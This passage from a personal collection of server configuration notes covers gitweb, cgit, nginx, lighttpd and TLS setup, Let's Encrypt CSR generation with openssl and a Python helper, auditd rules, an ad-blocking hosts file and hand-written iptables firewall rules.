is done by creating ``conf/config.local.php`` with::

    .git)
    $projectroot = "/home/git";

    # directory to use for temp files
    $git_temp = "/tmp";

    # target of the home link on top of all pages
    #$home_link = $my_uri || "/";

    # html text to include at home page
    #$home_text = "indextext.html";

    # file with project list; by default, simply scan the projectroot dir.
    #$projects_list = $projectroot;

    # stylesheet to use
    #@stylesheets = ("static/gitweb.css");

    # javascript code for gitweb
    #$javascript = "static/gitweb.js";

    # logo to use
    #$logo = "static/git-logo.png";
    #$logo_url = "http://localhost/git";
    #$logo_label = "Localhost Git Repositories";

    # the 'favicon'
    #$favicon = "static/git-favicon.png";

    # git-diff-tree(1) options to use for generated patches
    #@diff_opts = ("-M");
    @diff_opts = ();

    # This prevents gitweb from showing hidden repositories
    #$export_ok = "git-daemon-export-ok";
    #$strict_export = 1;

    # This lets it make the URLs you see in the header
    #@git_base_url_list = ( 'git://localhost/git' );

    # Features: syntax highlighting and blame view
    $feature{'highlight'}{'default'} = [1];
    $feature{'blame'}{'default'} = [1];


Apache configuration
--------------------
::

    <VirtualHost *:80>
        ServerName localhost

        SetEnv GIT_PROJECT_ROOT /home/git
        SetEnv GIT_HTTP_EXPORT_ALL

        AliasMatch ^/git/(.*/objects/[0-9a-f]{2}/[0-9a-f]{38})$ /home/git/$1
        AliasMatch ^/git/(.*/objects/pack/pack-[0-9a-f]{40}.(pack|idx))$ /home/git/$1
        # Remove git-receive-pack in the next line to forbid push to this server.
        # Note that git-http-backend only accepts pushes from users authenticated
        # by the web server, unless http.receivepack is set to true in the
        # repository configuration.
        ScriptAliasMatch \
            "(?x)^/git/(.*/(HEAD | \
                    info/refs | \
                    objects/info/[^/]+ | \
                    git-(upload|receive)-pack))$" \
            /usr/libexec/git-core/git-http-backend/$1

        ScriptAlias /git/ /usr/share/gitweb/gitweb.cgi/
        Alias /git /usr/share/gitweb
        <Directory /usr/share/gitweb>
            AddHandler cgi-script .cgi
            DirectoryIndex gitweb.cgi
            Options +ExecCGI

            AllowOverride None
            Require all granted
            # Apache <2.4 configuration:
            #Order allow,deny
            #Allow from all

            SetEnv GITWEB_CONFIG /home/git/gitweb.conf
        </Directory>
    </VirtualHost>


Nginx configuration
-------------------
::

    server {
        listen 80 default_server;
        listen [::]:80 default_server
                                ipv6only=on;
        #root /var/www/...;
        # Server name is used in the title of GitWeb pages
        server_name localhost;

        location / {
            try_files $uri $uri/ /index.html;
        }

        # Git over HTTP
        location ~ ^/git/.*\.git/objects/([0-9a-f]+/[0-9a-f]+|pack/pack-[0-9a-f]+.(pack|idx))$ {
            root /home/git;
        }
        # Remove git-receive-pack in the next line to forbid push to this server
        # (git-http-backend only accepts pushes from authenticated users unless
        # http.receivepack is set to true in the repository configuration)
        location ~ ^/git/(.*\.git/(HEAD|info/refs|objects/info/.*|git-(upload|receive)-pack))$ {
            rewrite ^/git(/.*)$ $1 break;
            fastcgi_pass unix:/var/run/fcgiwrap.socket;
            fastcgi_param SCRIPT_FILENAME /usr/lib/git-core/git-http-backend;
            fastcgi_param PATH_INFO $uri;
            fastcgi_param GIT_PROJECT_ROOT /home/git;
            fastcgi_param GIT_HTTP_EXPORT_ALL "";
            include fastcgi_params;
        }

        # Git web
        location /git/static/ {
            alias /usr/share/gitweb/static/;
        }
        location /git/ {
            fastcgi_pass unix:/var/run/fcgiwrap.socket;
            fastcgi_param SCRIPT_FILENAME /usr/share/gitweb/gitweb.cgi;
            fastcgi_param PATH_INFO $uri/git;
            fastcgi_param GITWEB_CONFIG /home/git/gitweb.conf;
            fastcgi_param GIT_HTTP_EXPORT_ALL "";
            include fastcgi_params;
        }
    }


Tips & Tricks
-------------

* Gitweb is written in Perl, so to use FastCGI you need to install
  ``libcgi-fast-perl``. On Debian::

      apt-get install libcgi-fast-perl

* To color files with syntax highlighting, you need to install the
  ``highlight`` program. On Debian::

      apt-get install highlight


CGit
----

CGit is a fast Git web interface written in C. As there are issues with Debian
packaging (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=515793), you may
need to follow the instructions on http://git.zx2c4.com/cgit/tree/README to
download, compile and install the latest release.

Let's say cgit files are installed in ``/var/www/htdocs/cgit/``. The web server
needs to be configured to serve the static files and the CGI, exactly like
gitweb. Here is an extract of an Nginx configuration file::

    location ~ ^/cgit\.(png|css)$ { root /var/www/htdocs/cgit/; }
    location ~ ^/cgit(/.*) {
        fastcgi_pass unix:/var/run/fcgiwrap.socket;
        fastcgi_param SCRIPT_FILENAME /var/www/htdocs/cgit/cgit.cgi;
        fastcgi_param PATH_INFO $1;
        fastcgi_param CGIT_CONFIG /home/git/cgitrc;
        include fastcgi_params;
    }

Here is an example of ``/home/git/cgitrc``::

    # Here are some default values
    css=/cgit.css
    favicon=/favicon.ico
    logo=/cgit.png
    root-title=Git repository browser
    root-desc=a fast webinterface for the git dscm

    # Global settings
    cache-size=1000
    enable-commit-graph=1
    # Let each repository's .git/config override its cgit settings (only
    # sensible when the repository owners are trusted)
    enable-git-config=1
    enable-index-links=1
    enable-log-filecount=1
    enable-log-linecount=1
    max-atom-items=100
    max-repo-count=10000
    max-stats=year
    remove-suffix=1
    snapshots=tar.gz tar.bz2 zip
    strict-export=git-daemon-export-ok

    # Custom configuration
    virtual-root=/cgit
    cache-root=/var/cache/cgit
    #project-list=/home/git/projects.list
    scan-path=/home/git/
    clone-prefix=http://localhost/git/
    readme=README

    # Syntax highlighting
    source-filter=/usr/lib/cgit/filters/syntax-highlighting.sh

To create a cache directory (if it doesn't already exist), run something like::

    mkdir -p /var/cache/cgit
    chown -R www-data: /var/cache/cgit
-------------------------------------------------------------------------------- /etc-server/web/lighttpd.conf: --------------------------------------------------------------------------------
# This file contains some customizations from the default lighttpd config.
# /etc/lighttpd/lighttpd.conf
# To check the config, run:
#   lighttpd -t -f /etc/lighttpd/lighttpd.conf
#
# Documentation:
#   http://redmine.lighttpd.net/projects/lighttpd/wiki

server.document-root = "/srv/http"
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/var/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"

# Listen to localhost
server.bind = "127.0.0.1"
server.port = 80
$SERVER["socket"] == "[::1]:80" {}
-------------------------------------------------------------------------------- /etc-server/web/nginx.conf: --------------------------------------------------------------------------------
# /etc/nginx/nginx.conf
# This file contains some customizations from the default configuration

user www-data;
worker_processes 4;
pid /var/run/nginx.pid;

events {
    worker_connections 768;
    # multi_accept on;
}

http {
    ##
    # Basic Settings
    ##

    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;

    # Only display "nginx" in the Server HTTP header
    server_tokens off;

    # server_names_hash_bucket_size 64;
    # server_name_in_redirect off;

    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    ##
    # Logging Settings
    ##

    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;

    ##
    # Gzip Settings
    ##

    # Caveat: compressing responses that mix secrets with attacker-controlled
    # input over TLS enables BREACH-style attacks; keep gzip off for such pages
    gzip on;
    gzip_disable "msie6";

    # gzip_vary on;
    # gzip_proxied any;
    # gzip_comp_level 6;
    # gzip_buffers 16 8k;
    # gzip_http_version 1.1;
    # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript;

    ##
    # Content charset
    ##
    charset UTF-8;

    ##
    # Virtual
    # Host Configs
    ##

    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;

    # Example of localhost
    server {
        listen 127.0.0.1:80 default_server;
        listen [::1]:80 default_server ipv6only=on;
        server_name localhost;
        root /srv/http;
        index index.html;

        # Deny access to hidden files and directories (.git, .htpasswd, ...)
        location ~ /\. {
            return 403;
        }

        # Allow access to static files, with GET/HEAD/POST only
        # (limit_except is only valid inside a location block)
        location / {
            limit_except GET HEAD POST {
                deny all;
            }
            try_files $uri $uri/ =404;
        }
    }
}
-------------------------------------------------------------------------------- /etc-server/web/ssl.rst: --------------------------------------------------------------------------------
SSL configuration on a web server
=================================

Many websites describe how to correctly set up an SSL/TLS web server with a
secure configuration. Here is a list of some that I've found:

* http://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
* https://wiki.mozilla.org/Security/Server_Side_TLS
* https://bettercrypto.org/ (with a paper which advises a configuration)

Here are example configurations for the ssl.example.com host with a certificate
signed by StartSSL (https://www.startssl.com/, now defunct) or Let's Encrypt
(https://letsencrypt.org/) or AlwaysOnSSL (https://alwaysonssl.com/).

Apache::

    # The stapling cache is only allowed in the global server context
    # (OCSP Stapling exists in httpd 2.3.3 and later)
    SSLStaplingCache shmcb:/var/run/ocsp(128000)

    <VirtualHost *:443>
        ServerName ssl.example.com
        SSLEngine on
        SSLCertificateFile /etc/ssl/ssl.example.com.crt
        SSLCertificateKeyFile /etc/ssl/ssl.example.com.key
        SSLCertificateChainFile /etc/ssl/intermediate.pem
        # Only needed to verify client certificates. /etc/ssl/certs is a
        # directory, so use SSLCACertificatePath, not SSLCACertificateFile.
        SSLCACertificatePath /etc/ssl/certs
        # TLS 1.0 and 1.1 are deprecated by RFC 8996: add -TLSv1 -TLSv1.1 unless
        # old clients must be supported
        SSLProtocol ALL -SSLv2 -SSLv3
        SSLHonorCipherOrder On
        SSLCipherSuite ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA
        SSLCompression Off

        # Enable this if you want HSTS (recommended, but be careful: browsers
        # will refuse plain HTTP for this host during max-age seconds)
        # Header add Strict-Transport-Security "max-age=15768000"

        # OCSP Stapling
        SSLUseStapling On
        SSLStaplingResponderTimeout 5
        SSLStaplingReturnResponderErrors off
    </VirtualHost>


Nginx::

    server {
        # "ssl on;" is deprecated; the ssl parameter of listen replaces it
        listen 443 ssl;
        server_name ssl.example.com;
        # certs sent to the client in SERVER HELLO are concatenated
        ssl_certificate /etc/ssl/ssl.example.com_and_intermediates.pem;
        ssl_certificate_key /etc/ssl/ssl.example.com.key;
        ssl_dhparam /etc/ssl/dhparam.pem;
        ssl_session_timeout 10m;
        # TLS 1.0 and 1.1 are deprecated by RFC 8996: prefer "TLSv1.2 TLSv1.3"
        # unless old clients must be supported
        ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA;
        ssl_prefer_server_ciphers on;
        ssl_session_cache shared:SSL:10m;

        # Enable this if you want HSTS (recommended, but be careful)
        # add_header Strict-Transport-Security max-age=15768000;

        # OCSP Stapling
        # fetch OCSP records from URL in ssl_certificate and cache them
        ssl_stapling on;
        ssl_stapling_verify on;
        # verify chain of trust of OCSP response using Root
        # CA and Intermediate certs
        ssl_trusted_certificate /path/to/root_CA_cert_plus_intermediates;
        # IP address of the DNS resolver to be used to obtain the IP address of
        # the OCSP responder
        resolver 127.0.0.1;
    }

To generate the Diffie-Hellman parameters for DHE ciphersuites, use::

    openssl dhparam -out /etc/ssl/dhparam.pem 4096


Testing configuration
---------------------

Here are several commands to be used to check a running HTTPS web server.

Establish a TLS (or SSL) connection::

    openssl s_client -connect ssl.example.com:443 -servername ssl.example.com -showcerts

Use a web service, like Qualys' SSL Server Test:
https://www.ssllabs.com/ssltest/

This web page helps display what your browser supports:
https://www.ssllabs.com/ssltest/viewMyClient.html


Using Let's Encrypt
-------------------

The official Let's Encrypt client (https://github.com/letsencrypt/letsencrypt)
needs to run as root on the server which will use the certificate. Thankfully
there exist other ways of signing certificates:

* https://github.com/diafygi/letsencrypt-nosudo Let's Encrypt Without Sudo
* https://gethttpsforfree.com/ Get HTTPS for free! (web interface to Let's Encrypt)

These methods rely on some openssl commands to use an account key.

* To create an account key and print the associated public key::

      openssl genrsa 4096 > account.key
      openssl rsa -in account.key -pubout

* To sign what needs to be signed::

      echo -n 'Content' | openssl dgst -sha256 -hex -sign account.key

To generate a Certificate Signing Request (CSR) for a domain with X509v3
Subject Alternative Name (SAN), these commands can be used (the ``<(...)``
process substitution requires bash)::

    openssl genrsa 4096 > ssl.example.com.key
    openssl req -new -sha256 -key ssl.example.com.key -subj "/" \
        -reqexts SAN -config <(cat /etc/ssl/openssl.cnf \
        <(printf "[SAN]\nsubjectAltName=DNS:example.com,DNS:ssl.example.com"))

On some systems the OpenSSL configuration file lies elsewhere, for example in
``/etc/pki/tls/openssl.cnf`` or in ``/System/Library/OpenSSL/openssl.cnf``
(Mac OS).

In order to validate the ownership of a domain, a generated file needs to be
served over HTTP (not HTTPS), which may for example give::

    $ curl http://ssl.example.com/.well-known/acme-challenge/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
    abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg

To do this on a live (production) system, a possible way consists in serving
/.well-known/acme-challenge from a specific directory, where an administrator
will put the needed files. With nginx, a configuration can be::

    server {
        listen 127.0.0.1:80;
        listen [::1]:80;
        server_name ssl.example.com;

        # Let's Encrypt
        location /.well-known/acme-challenge {
            alias /var/acme-challenge/ssl.example.com;
        }
        location / {
            rewrite ^(.*) https://ssl.example.com$1 permanent;
        }
    }

Then an admin can put the files needed for Let's Encrypt to verify domain
ownership in directory ``/var/acme-challenge/ssl.example.com/``.
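The account-key and CSR steps above, driven from Python, as an added example
that is not part of this page nor of the Let's Encrypt clients it links to. It
assumes only that the ``openssl`` binary is in ``PATH``: it writes its own
minimal OpenSSL config (so it depends neither on the location of
``openssl.cnf`` nor on bash's ``<(...)`` trick), and it checks its own results
the way one would before talking to a CA: the signature verifies against the
account's public key and fails on tampered data, the CSR passes
``openssl req -verify`` and carries exactly the requested DNS names. The
2048-bit key size (chosen to keep the demo quick; use 4096 as above for real
keys) and the ``Content`` payload are the example's own choices.

```python
"""Account key, signature and SAN CSR with OpenSSL, from Python (added example)."""
import functools
import os
import re
import subprocess
import tempfile


def openssl(*args, stdin=None):
    """Run an openssl subcommand, fail loudly on error, return its stdout."""
    return subprocess.run(["openssl", *args], input=stdin,
                          capture_output=True, check=True).stdout


def generate_rsa_key(path, bits=2048):
    """Same as `openssl genrsa <bits> > key`; the file is made private right away."""
    openssl("genrsa", "-out", path, str(bits))
    os.chmod(path, 0o600)


def public_key_pem(key_path):
    """Same as `openssl rsa -in account.key -pubout`: the key a CA registers."""
    return openssl("rsa", "-in", key_path, "-pubout")


def sign_sha256(key_path, data):
    """Same as `openssl dgst -sha256 -sign account.key`, as raw signature bytes."""
    return openssl("dgst", "-sha256", "-sign", key_path, stdin=data)


def verify_sha256(pub_pem, data, signature):
    """True when `signature` is a valid RSA/SHA-256 signature of `data` by the public key."""
    with tempfile.TemporaryDirectory() as tmp:
        pub, sig = os.path.join(tmp, "pub.pem"), os.path.join(tmp, "sig.bin")
        with open(pub, "wb") as f:
            f.write(pub_pem)
        with open(sig, "wb") as f:
            f.write(signature)
        done = subprocess.run(["openssl", "dgst", "-sha256", "-verify", pub,
                               "-signature", sig], input=data, capture_output=True)
    return done.returncode == 0


def make_san_csr(key_path, csr_path, dns_names):
    """Build a CSR with an empty subject and the DNS names as subjectAltName."""
    cnf = csr_path + ".cnf"
    with open(cnf, "w") as f:
        # [req] must name a distinguished_name section even when -subj supplies
        # the (empty) subject; the [dn] section itself can stay empty.
        f.write("[req]\ndistinguished_name = dn\n[dn]\n[SAN]\nsubjectAltName = "
                + ",".join("DNS:" + name for name in dns_names) + "\n")
    openssl("req", "-new", "-sha256", "-key", key_path, "-subj", "/",
            "-reqexts", "SAN", "-config", cnf, "-out", csr_path)


def csr_san_names(csr_path):
    """Read the DNS SANs back from `openssl req -text`, to check before submitting."""
    text = openssl("req", "-in", csr_path, "-noout", "-text").decode()
    match = re.search(r"Subject Alternative Name:\s*\n\s*(.+)", text)
    if not match:
        return []
    entries = [e.strip() for e in match.group(1).split(",")]
    return [e[len("DNS:"):] for e in entries if e.startswith("DNS:")]


def csr_signature_ok(csr_path):
    """Same as `openssl req -verify`: the CSR must be self-signed by the domain key."""
    done = subprocess.run(["openssl", "req", "-in", csr_path, "-noout", "-verify"],
                          capture_output=True)
    return done.returncode == 0


@functools.lru_cache(maxsize=None)
def demo(dns_names=("example.com", "ssl.example.com")):
    """Run the whole flow in a scratch directory and report what was checked."""
    with tempfile.TemporaryDirectory() as tmp:
        account_key = os.path.join(tmp, "account.key")
        domain_key = os.path.join(tmp, "ssl.example.com.key")
        csr = os.path.join(tmp, "ssl.example.com.csr")
        generate_rsa_key(account_key)
        pub = public_key_pem(account_key)
        payload = b"Content"  # constructed stand-in for what the ACME flow asks to sign
        sig = sign_sha256(account_key, payload)
        generate_rsa_key(domain_key)
        make_san_csr(domain_key, csr, dns_names)
        return {
            "signature_ok": verify_sha256(pub, payload, sig),
            "tampered_rejected": not verify_sha256(pub, payload + b"x", sig),
            "sans": csr_san_names(csr),
            "csr_ok": csr_signature_ok(csr),
        }


if __name__ == "__main__":
    print(demo())
```

The hex signature printed by the ``-hex`` command above is the same value as
``sign_sha256(...).hex()``; the raw form is kept here because ``openssl dgst
-verify`` expects the binary signature.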

-------------------------------------------------------------------------------- /etc/audit/audit.rules: --------------------------------------------------------------------------------
# Reload this file with:
#   auditctl -D && auditctl -R /etc/audit/audit.rules
# (this only works until the "-e 2" rule at the end of this file has been
# loaded: the configuration is then immutable until the next reboot)
#
# Then list rules with:
#   auditctl -l
#
# and generate a report with:
#   aureport -i -k --summary
#
# Documentation:
# - section 6.7.3 of https://www.ssi.gouv.fr/uploads/2015/10/NP_Linux_Configuration.pdf

# Monitor insmod, rmmod and modprobe
-w /usr/bin/insmod -p x -k audit_modules
-w /usr/bin/modprobe -p x -k audit_modules
-w /usr/bin/rmmod -p x -k audit_modules
-w /sbin/insmod -p x -k audit_modules
-w /sbin/modprobe -p x -k audit_modules
-w /sbin/rmmod -p x -k audit_modules

# Log modifications in /etc/
-w /etc/ -p wa -k audit_conf

# Log mount and unmount operations
-a exit,always -F arch=b32 -S mount -S umount2 -k audit_mount
-a exit,always -F arch=b64 -S mount -S umount2 -k audit_mount

# Log suspicious x86 syscalls
-a exit,always -F arch=b32 -S ioperm -S modify_ldt -k audit_syscall
-a exit,always -F arch=b64 -S ioperm -S modify_ldt -k audit_syscall

# Log uncommon syscalls which need some close monitoring
-a exit,always -F arch=b32 -S get_kernel_syms -S ptrace -S prctl -k audit_syscall
-a exit,always -F arch=b32 -S init_module -S finit_module -k audit_syscall
-a exit,always -F arch=b32 -S perf_event_open -k audit_syscall
-a exit,always -F arch=b64 -S get_kernel_syms -S ptrace -S prctl -k audit_syscall
-a exit,always -F arch=b64 -S init_module -S finit_module -k audit_syscall
-a exit,always -F arch=b64 -S perf_event_open -k audit_syscall

# Lock the auditd configuration (immutable until reboot)
-e 2
-------------------------------------------------------------------------------- /etc/hosts:
--------------------------------------------------------------------------------
#
# /etc/hosts: static lookup table for host names
#

#
127.0.0.1       localhost.localdomain localhost
# MyHostName should be what's in /etc/hostname
127.0.1.1       MyHostName
::1             localhost.localdomain localhost ip6-localhost ip6-loopback

# Speed up non-numeric iptables listing
# For IPv4 there are some PTR records in DNS with mcast.net subdomains
224.0.0.0       ip4-mcast224
224.0.0.1       ip4-allsystems
224.0.0.2       ip4-allrouters
224.0.0.22      ip4-igmp
224.0.0.251     ip4-mdns
239.0.0.0       ip4-mcast239
255.255.255.255 ip4-broadcast

fe00::0         ip6-localnet
ff00::0         ip6-mcastprefix
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
ff02::fb        ip6-mdns

# Blacklist some advertisement providers by resolving them locally
# To follow every DNS query on Linux, you can use a command such as:
#   tshark -n udp dst port 53
0.0.0.1 ad.doubleclick.net
0.0.0.1 googleads.g.doubleclick.net
0.0.0.1 pubads.g.doubleclick.net
0.0.0.1 pagead2.googlesyndication.com
0.0.0.1 pixel.quantserve.com

# See also https://github.com/StevenBlack/hosts to block ads using /etc/hosts
-------------------------------------------------------------------------------- /etc/index.rst: --------------------------------------------------------------------------------
``/etc``
========

.. toctree::
   :maxdepth: 1
   :glob:

   **
-------------------------------------------------------------------------------- /etc/iptables/empty.rules: --------------------------------------------------------------------------------
# Empty iptables rule file
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
-------------------------------------------------------------------------------- /etc/iptables/iptables-desktop.rules: --------------------------------------------------------------------------------
# This file contains a basic set of rules to apply for an Internet client.
# Please adapt these rules to make them match what you use.


*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]

# IPv6: Disable processing of any RH0 packet to prevent ping-pong
-6 -A INPUT -m rt --rt-type 0 -j DROP
-6 -A FORWARD -m rt --rt-type 0 -j DROP
-6 -A OUTPUT -m rt --rt-type 0 -j DROP

##############################################################################
# INPUT filters

# Trust local loopback
-A INPUT -i lo -j ACCEPT

# Broadcast pings are allowed and produce replies in invalid states
-4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -m limit --limit 2/sec -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -m limit --limit 2/sec -j ACCEPT

# Drop invalid packets
-A INPUT -m conntrack --ctstate INVALID -j DROP

# Drop DHCP requests but accept answers
-4 -A INPUT -p udp -m udp --sport 68 --dport 67 -j DROP
-4 -A INPUT -p udp -m udp --sport 67 --dport 68 -j ACCEPT

# Drop DHCPv6 requests but accept answers
-6 -A INPUT -p udp -m udp --sport 547 --dport 546 -j DROP
-6 -A INPUT -p udp -m udp --sport 546 --dport 547 -j ACCEPT

# port range is in /proc/sys/net/ipv4/ip_local_port_range
# If conntrack is not available (old kernel),
# use -m state --state instead
-A INPUT -p tcp -m tcp --dport 32768:61000 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p udp -m udp --dport 32768:61000 -m conntrack --ctstate ESTABLISHED -j ACCEPT
# Most DNS resolvers (BIND, PowerDNS, ...) use their own port numbers.
# Caveat: this rule matches on the source port only, so any UDP packet sent
# from port 53 to a high port is accepted without connection tracking.
-A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -j ACCEPT

# If conntrack module is not available, state module doesn't work well for IPv6
# so use these rules instead
#-6 -A INPUT -p tcp -m tcp --dport 32768:61000 ! --syn -j ACCEPT
#-6 -A INPUT -p udp -m udp --dport 32768:61000 -j ACCEPT


# ICMPv4 echo reply, dest unreachable, echo request, time exceeded, parameter problem
-4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -j ACCEPT
-4 -A INPUT -p icmp -m icmp --icmp-type 3 -j ACCEPT
-4 -A INPUT -p icmp -m icmp --icmp-type 8/0 -j ACCEPT
-4 -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT
-4 -A INPUT -p icmp -m icmp --icmp-type 12 -j ACCEPT

# ICMPv6 dest unreachable, packet too big, time exceeded, parameter problem
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 1 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 2 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 3 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 4 -j ACCEPT
# ICMPv6 echo request, echo reply
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 128/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -j ACCEPT
# IPv6 Multicast Listener Query, Report and Done
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 130/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 131/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 132/0 -j ACCEPT
# Neighbor Discovery Protocol: RS, RA, NS, NA
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 133/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 134/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 135/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 136/0 -j ACCEPT


# Accept SSH, HTTP, HTTPS, ... (activate only the ones needed)
#-A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT

# Accept NTP
-A INPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT


# Accept IGMP (multicast) and mDNS
# 224.0.0.1 = to all hosts
# 224.0.0.2 = to all routers
# 224.0.0.22 = IGMPv3
# 224.0.0.251 = mDNS
# TODO: use -m pkttype --pkt-type multicast -j ACCEPT ?
-4 -A INPUT -d 224.0.0.1/32 -p igmp -j ACCEPT
-4 -A INPUT -d 224.0.0.2/32 -p igmp -j ACCEPT
-4 -A INPUT -d 224.0.0.22/32 -p igmp -j ACCEPT
-4 -A INPUT -d 224.0.0.251/32 -p igmp -j ACCEPT
-4 -A INPUT -d 224.0.0.251/32 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT
-6 -A INPUT -d ff02::fb/128 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT

# Accept NetBIOS/SMB. Caveat: this exposes file sharing on every network the
# client joins; restrict it with -s to the trusted LAN or disable it.
-A INPUT -p tcp -m multiport --dports 139,445 -j ACCEPT
-A INPUT -p udp -m udp --sport 137:138 --dport 137:138 -j ACCEPT

# Silently drop some LAN discovery services
-4 -A INPUT -p udp -m udp --sport 3483 --dport 3483 -m comment --comment "Slim Devices" -j DROP
-4 -A INPUT -p udp -m udp --sport 17500 --dport 17500 -m comment --comment "DropBox" -j DROP

# Silently drop unsolicited broadcast and multicast
-A INPUT -m pkttype --pkt-type broadcast -j DROP
-A INPUT -m pkttype --pkt-type multicast -j DROP
# This rule is still here to really avoid rejecting an IPv4 broadcast
-4 -A INPUT -d 255.255.255.255/32 -j DROP

# Log to NFLOG (a userspace netlink group) instead of the kernel log, so that
# logs don't fill up and debugging is quick
#-A INPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[IN DROP] "
-A INPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG

# Reject packets, with some stats in iptables -nvL and ip6tables -nvL
-A INPUT -p tcp -j REJECT --reject-with tcp-reset
-4 -A INPUT -p udp -j REJECT --reject-with icmp-port-unreachable
-6 -A INPUT -p udp -j REJECT --reject-with icmp6-port-unreachable
-4 -A INPUT -p icmp -j DROP
-6 -A INPUT -p ipv6-icmp -j DROP
-4 -A INPUT -j REJECT --reject-with icmp-proto-unreachable
-6 -A INPUT -j REJECT


##############################################################################
# OUTPUT filters

# These filters respect the symmetry of INPUT filters

-A OUTPUT -o lo -j ACCEPT
-4 -A OUTPUT -p udp -m udp --sport 67 --dport 68 -j DROP
-4 -A OUTPUT -p udp -m udp --sport 68 --dport 67 -j ACCEPT
-4 -A OUTPUT -p icmp -j ACCEPT
-6 -A OUTPUT -p ipv6-icmp -j ACCEPT

# Accept TCP reset and FIN+ACK
-A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j ACCEPT
-A OUTPUT -p tcp -m tcp --tcp-flags FIN,ACK FIN,ACK -j ACCEPT

-4 -A OUTPUT -d 255.255.255.255/32 -j DROP
-4 -A OUTPUT -m conntrack --ctstate INVALID -j DROP

# Refuse to send emails directly through SMTP (port 25). Use the mail
# submission port (587, with STARTTLS) or SMTPS (465) to send mail instead.
-A OUTPUT -p tcp -m tcp --dport 25 -j REJECT

-A OUTPUT -p tcp -m tcp --sport 32768:61000 -j ACCEPT
-A OUTPUT -p udp -m udp --sport 32768:61000 -j ACCEPT
-A OUTPUT -p udp -m udp --sport 1024:65535 --dport 53 -j ACCEPT

#-A OUTPUT -p tcp -m multiport --sports 22,80,443 -j ACCEPT
-A OUTPUT -p udp -m udp --dport 123 -j ACCEPT

-4 -A OUTPUT -d 224.0.0.1/32 -p igmp -j ACCEPT
-4 -A OUTPUT -d 224.0.0.2/32 -p igmp -j ACCEPT
-4 -A OUTPUT -d 224.0.0.22/32 -p igmp -j ACCEPT
-4 -A OUTPUT -d 224.0.0.251/32 -p igmp -j ACCEPT
-4 -A OUTPUT -d 224.0.0.251/32 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT
-6 -A OUTPUT -d ff02::fb/128 -p udp -m udp --sport 5353 --dport 5353 -j ACCEPT

#-A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[OUT DROP] "
-A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG

# Reject other packets, with some stats in iptables -nvL and ip6tables -nvL
-A OUTPUT -p tcp -j REJECT --reject-with tcp-reset
-4 -A OUTPUT -p udp -j REJECT --reject-with icmp-port-unreachable
-6 -A OUTPUT -p udp -j REJECT --reject-with icmp6-port-unreachable
-4 -A OUTPUT -j REJECT --reject-with icmp-proto-unreachable
-6 -A OUTPUT -j REJECT

COMMIT
-------------------------------------------------------------------------------- /etc/iptables/iptables-server.rules: --------------------------------------------------------------------------------
# This file contains a basic set of rules to apply for an Internet server.
# Please adapt these rules to make them match what you use.
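Both rule files (the desktop one above and the server one that follows) are
written by hand, and a hand-written iptables-restore file is easy to get subtly
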